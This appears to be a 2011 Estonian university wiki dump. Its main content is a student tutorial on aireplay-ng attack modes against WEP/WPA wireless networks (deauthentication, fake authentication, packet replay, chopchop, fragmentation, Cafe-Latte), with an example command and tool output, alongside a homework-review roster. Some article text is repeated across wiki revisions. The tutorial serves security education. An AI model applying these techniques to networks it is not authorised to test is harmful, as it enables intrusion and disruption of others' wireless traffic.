Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Võrgurakendused II: 2011 kevadel valminud kodutööd

2011-05-23T06:04:06Z

Tliiv: /* Tanel Liiv */

=Jaan Igamees=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Kert Suvi=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Helen Muidik=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Mihkel Sokk=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Seda Sahradyan=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Priit Siimo=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Siim Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Reigo Männiste=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Karl Männil=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Ilmar Telga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus projektile kokkuvõtvalt

=Siim Aaver=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "H2"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Taavi Ilves=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele [[Talk:Meeskond_"Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jaan Kruusma=
* Meeskond [[Meeskond "Hungry_Student_Food_Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Andrus Reedla=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jaak Lehtsalu=
* Meeskond [[Meeskond "Tact"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele [[Talk:Meeskond Tool]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jana Mrots=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Heiki Tamm=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Meeskond"]]
** Arvustus XML failile [[Talk:Meeskond "Hungry Student Food Board"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Toomas Soha=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Miina Sikk=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tact"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Rauno Rüga=
* Meeskond [[Meeskond "FoodWars"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenuse klientidele [[Talk:Meeskond Tool]]
** Arvustus projektile kokkuvõtvalt

=Tanel Liiv=
* Meeskond [[Meeskond "Hungry Student Food Board"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Gaspar Karm=
* Meeskond [[Meeskond "GAP"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "FoodWars"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Joosep Ilves=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Taivo Türnpu=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond Tool]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Sander Baikov=
* Meeskond [[Meeskond "Sepad"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Allar Anijago=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tool"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Sarv=
* Meeskond [[Meeskond "C terav"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Nämm-nämm"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Kaspar Kallasmaa=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Jarko Kaskmaa=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Tyhik"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Indrek Kõue=
* Meeskond [[Meeskond "ASP-tastic"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "GAP"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Erik Kaju=
* Meeskond [[Meeskond Tool]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond ""]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Mailis Toompuu=
* Meeskond [[Meeskond "H2"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "Sepad"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Madis Kõosaar=
* Meeskond [[Meeskond "Tyhik"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "C terav"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

=Gert Glükmann=
* Meeskond [[Meeskond "Nämm-nämm"]]
* Arvustused
** Arvustus XML failile [[Talk:Meeskond "ASP-tastic"]]
** Arvustus veebiteenusele
** Arvustus veebiteenuse klientidele
** Arvustus projektile kokkuvõtvalt

Talk:Meeskond "Tyhik"

2011-05-23T06:01:59Z

Tliiv:

Talk:Meeskond "Tyhik"

2011-05-23T06:01:43Z

Tliiv:

Aireplay-ng ründerežiimid

2011-05-22T20:23:42Z

Tliiv:

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

